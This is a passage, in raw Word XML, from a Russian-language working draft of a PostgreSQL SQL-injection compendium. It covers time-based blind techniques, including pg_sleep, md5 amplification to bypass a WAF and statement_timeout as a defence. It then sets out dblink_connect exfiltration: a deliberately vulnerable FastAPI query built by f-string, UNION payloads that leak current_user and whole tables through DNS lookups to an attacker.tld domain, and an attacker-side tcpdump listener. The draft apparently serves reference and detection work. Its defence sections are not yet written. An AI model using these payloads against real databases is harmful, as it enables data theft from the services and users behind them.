    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep(0.5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отрабатывает, но 500 мс над baseline 100 мс на границе различимости.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Чем меньше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тем более «шумный» oracle, и тем больше повторов нужно атакующему — это превращает практически осуществимую атаку в часы или дни.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Правильный паттерн.</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ставится на уровне БД (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER DATABASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), сессии (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), или в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Типичное продакшен-значение для OLTP — 5–30 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Связанный параметр — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">idle_in_transaction_session_timeout</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — закрывает оставленные открытыми транзакции.</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существует с PG 8.0.</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3.4.1, 3.4.2, 3.4.3, 5.5.1.</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PostgreSQL Documentation: Client Connection Defaults — statement_timeout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари категории 3.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1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CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — базовый time-based oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.2 Амплификация через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md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обход WAF на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.3 Рекурсивный CTE — ещё один способ нагрузить backend без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_sleep</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.4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как пассивная защита</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Использованные источники из research: нет — категория покрывается PG Docs и стандартными SQLi-cheat-sheet.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фигурирует в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> проекта в детекторе time-based.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Статус документа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это рабочая версия документа на момент сборки. Готовы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 1 — Введение (1.1–1.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Раздел 2 — Контекст PostgreSQL (2.1–2.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.1 — UNION-based</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.2 — Error-based через cast</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.3 — Boolean-based blind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.4 — Time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не написаны: категории 3.5–3.17, раздел 4 (CVE), раздел 5 (защита), раздел 6 (приложения). Сборка в финальный документ — после написания всех разделов.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
      <w:pgNumType/>
      <w:docGrid w:linePitch="360"/>
    </w:sectPr>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6.1 dblink_connect — TCP и DNS эксфильтрация</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принимает libpq-conninfo строкой и инициирует исходящий коннект к произвольному хосту от имени backend-процесса PostgreSQL. Поскольку libpq до любого TCP-handshake делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo(host)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а startup-packet с полями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database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> уходит plaintext до возможной SSL-сессии — оба этапа становятся каналами эксфильтрации произвольных SQL-данных, даже если HTTP-ответ ничего не возвращает.</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app/api/v1/search.py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@router.get("/users")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def search_users(name: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id, email FROM users WHERE name = '{name}'")</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напрямую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WHERE name = '&lt;input&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Параметризации нет, любая UNION/stacked инъекция проходит до сервера как одна команда.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — DNS-канал, простой (current_user)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий контролирует authoritative DNS для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.tld</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через Burp Collaborator или собственный bind с query-логом). Своего PostgreSQL-сервера поднимать не нужно.</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1, dblink_connect('host=' || current_user || '.exfil.attacker.tld dbname=x user=x password=x')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email FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE name = 'x' UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  'host=' || current_user || '.exfil.attacker.tld dbname=x user=x password=x'</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вычисляет conninfo, libpq делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">getaddrinfo("app_user.exfil.attacker.tld")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, DNS-запрос приходит на authoritative-сервер атакующего. TCP-коннект на 5432 потом упадёт (никто не слушает) — это нормально, payload уже сработал на этапе DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего (минимум):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i any -nn 'port 53' | grep exfil.attacker.tld</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload B — DNS-канал, chunked hex (полная таблица)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эксфильтрация любого по объёму значения через серию DNS-запросов. Hex-encoding выбран потому, что DNS labels per RFC 1035 ограничены charset </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[A-Za-z0-9-]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и длиной ≤ 63 байта. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">encode(..., 'hex')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> гарантированно даёт только </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[0-9a-f]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base64</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escape</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\xNN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) для DNS-канала </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не подходят</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Chunk-size 60 байт с запасом от лимита 63.</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0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x' UNION SELECT 1, dblink_connect(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
